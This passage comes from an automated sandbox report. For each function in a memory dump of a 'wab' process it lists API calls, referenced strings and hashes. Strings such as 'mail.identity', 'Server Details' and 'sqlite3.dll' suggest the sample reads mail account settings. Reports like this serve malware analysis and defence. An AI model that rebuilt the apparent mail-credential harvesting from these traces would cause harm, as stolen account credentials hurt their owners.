                                                                                            • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                            • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 368790112-0
                                                                                            • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                            • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                            • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                            • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • __allrem.LIBCMT ref: 00425850
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                            • __allrem.LIBCMT ref: 00425933
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1992179935-0
                                                                                            • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                            • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                            • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                            • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                            • too many SQL variables, xrefs: 0042C6FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                            • API String ID: 2221118986-515162456
                                                                                            • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                            • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                            • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                            • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                            • memset.MSVCRT ref: 004026AD
                                                                                              • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                              • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                              • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                            • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                            • String ID:
                                                                                            • API String ID: 1593657333-0
                                                                                            • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                            • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                            • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                            • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                              • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                                                                                            • strlen.MSVCRT ref: 0040B60B
                                                                                            • atoi.MSVCRT ref: 0040B619
                                                                                            • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                            • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                            • String ID:
                                                                                            • API String ID: 4107816708-0
                                                                                            • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                            • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                            • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                            • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                            • String ID:
                                                                                            • API String ID: 1886415126-0
                                                                                            • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                            • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                            • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                            • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: strlen
                                                                                            • String ID: >$>$>
                                                                                            • API String ID: 39653677-3911187716
                                                                                            • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                            • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                            • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                            • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: @
                                                                                            • API String ID: 3510742995-2766056989
                                                                                            • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                            • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                            • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                            • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strcmpi
                                                                                            • String ID: C@$mail.identity
                                                                                            • API String ID: 1439213657-721921413
                                                                                            • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                            • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                            • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                            • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00406640
                                                                                              • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                              • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                                                                                              • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                                                                                            • memcmp.MSVCRT ref: 00406672
                                                                                            • memcpy.MSVCRT ref: 00406695
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset$memcmp
                                                                                            • String ID: Ul@
                                                                                            • API String ID: 270934217-715280498
                                                                                            • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                            • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                            • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                            • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                                                            • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                            • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                                                            • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                            Strings
                                                                                            • recovered %d pages from %s, xrefs: 004188B4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                            • String ID: recovered %d pages from %s
                                                                                            • API String ID: 985450955-1623757624
                                                                                            • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                            • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                            • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                            • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _ultoasprintf
                                                                                            • String ID: %s %s %s
                                                                                            • API String ID: 432394123-3850900253
                                                                                            • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                            • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                            • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                            • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                            • sprintf.MSVCRT ref: 0040909B
                                                                                              • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                              • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                              • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                              • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                              • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                            • String ID: menu_%d
                                                                                            • API String ID: 1129539653-2417748251
                                                                                            • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                            • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                            • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                            • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _msizerealloc
                                                                                            • String ID: failed memory resize %u to %u bytes
                                                                                            • API String ID: 2713192863-2134078882
                                                                                            • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                            • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                            • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                            • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                            • strrchr.MSVCRT ref: 00409808
                                                                                            • _mbscat.MSVCRT ref: 0040981D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileModuleName_mbscatstrrchr
                                                                                            • String ID: _lng.ini
                                                                                            • API String ID: 3334749609-1948609170
                                                                                            • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                            • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                            • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                            • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • _mbscpy.MSVCRT ref: 004070EB
                                                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                            • _mbscat.MSVCRT ref: 004070FA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscat$_mbscpystrlen
                                                                                            • String ID: sqlite3.dll
                                                                                            • API String ID: 1983510840-1155512374
                                                                                            • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                            • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                            • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                            • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileString
                                                                                            • String ID: A4@$Server Details
                                                                                            • API String ID: 1096422788-4071850762
                                                                                            • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                            • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                            • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                            • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID:
                                                                                            • API String ID: 438689982-0
                                                                                            • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                            • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                            • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                            • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLocalmemcpymemsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 3110682361-0
                                                                                            • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                            • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                            • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                            • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 3510742995-0
                                                                                            • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                            • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                            • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                            • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%